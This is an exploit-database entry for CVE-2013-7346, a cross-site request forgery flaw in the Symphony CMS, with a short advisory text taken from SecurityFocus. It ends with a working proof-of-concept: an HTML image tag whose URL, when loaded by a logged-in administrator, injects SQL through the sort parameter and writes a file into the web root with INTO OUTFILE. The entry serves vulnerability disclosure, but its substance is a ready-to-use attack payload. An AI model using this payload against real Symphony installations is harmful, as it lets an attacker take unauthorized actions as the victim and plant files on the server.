Symphony 2.2.4 - Cross-Site Request Forgery
| EKU-ID: 43493 | CVE: CVE-2013-7346;OSVDB-91983 | OSVDB-ID: |
| Author: High-Tech Bridge | Published: 2014-03-24 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 43493 | CVE: CVE-2013-7346;OSVDB-91983 | OSVDB-ID: |
| Author: High-Tech Bridge | Published: 2014-03-24 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/66536/info Symphony is prone to a cross-site request-forgery vulnerability. An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks. Symphony version 2.3.1 and prior are vulnerable. <img src="http://www.example.com/symphony/system/authors/?order=asc&sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20">